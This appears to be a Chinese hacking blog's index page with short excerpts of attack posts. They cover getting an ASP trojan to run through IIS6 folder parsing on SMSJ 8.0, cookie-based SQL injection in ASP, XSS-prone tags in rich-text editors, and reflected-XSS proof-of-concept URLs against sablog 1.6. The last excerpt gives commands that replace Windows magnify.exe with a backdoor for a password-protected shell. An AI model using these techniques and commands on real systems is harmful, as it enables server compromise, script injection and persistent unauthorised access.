最新SMSJ Version 8.0漏洞
作者:rover
帮朋友检测网站的安全性,用的是SMSJ Version 8.0,号称仿阿里巴巴的东西,注册企业会员后,登录管理,发现上传图片会归类到一个http://www.rover.com/UserDocument/你注册的会员帐号/picture/的目录里不由让人浮想联翩,想起早期动易的那个注册漏洞
说起这个漏洞,完全是iis6引起的,在iis6的站点上,建立一个xx.asp的文件夹,然后在里面放一个改成gif后缀的asp木马,照样会按asp来执行,看了下服务器,八成是win2003,也就是iis6了然后我试着注册rover.asp的用户,注册那里到是过滤了特殊字符的,但是看了下,只是用简单的javascript限制的
代码如下:
阅读全文 »
Cookie注入是怎样产生的
作者:啊D
现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~感觉这样的防注入系统不错,但防注入系统没有注意到 Cookies 的问题!所以就有了Cookies注入~~
我们来研究一下怎样情况下才会有Cookies注入!如果你学过ASP你应该会知道
Request.QueryString (GET)
或
Request.Form (POST)!
呵,没错,这就是我们用于读取用户发给WEB服务器的指定键中的值!我们有时为了简化代码,会写成
ID=Request("ID")
这样写法是简单了,但问题就来了~~~我们先看WEB服务是怎样读取数据的,他是先取GET中的数据,没有再取POST中的数据,还会去取Cookies中的数据(晕,书上没有这么说,这是和小高交流时才知道~~看来书说的不全~~)
阅读全文 »
黑客入门之富文本编辑器的跨站脚本问题
来源:Neeao's Security Blog
富文本编辑器是一个开放式的HTML内容编辑环境,必须实现文字样式、链接、图片等功能的HTML,所以用户 POST的内容必须含有HTML标签,但是任由用户输入各类HTML标签,会造成一些潜在的恶意脚本攻击,借这类情况正好分析出现XSS的情况,主要针对 IE浏览器.
一.首先是微软建议我们可能造成恶意脚本攻击的标签.
类似如下的
tag:
applet
base
basefont
bgsound
blink
body
embed
frame
frameset
head
html
ilayer
iframe
layer
link
meta
object
style
title
script
———————————–
阅读全文 »
sablog 1.6 多个跨站漏洞
Date:2008-03-27
Author:amxku[c.r.s.t]
Version:sablog 1.6
由于过滤不严,存在多个跨站漏洞
PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1
阅读全文 »
放大镜后门生成器
来源:红狼论坛
PS:刚刚在红狼论坛看到的,具体未测试…简单看了下,估计是类似以前那种 shift 后门差不多….
设本程序为ivy.exe则运行以下命令即可
copy %systemroot%\system32\magnify.exe %systemroot%\system32\nagnify.exe
copy ivy.exe %systemroot%\system32\magnify.exe
copy ivy.exe %systemroot%\system32\dllcache\magnify.exe
注:win+u,选择放大镜,输入你设定的后门启动密码,可执行cmd.exe和程序自己添加自定义用户(调用API防止cmd.exe被禁用)
阅读全文 »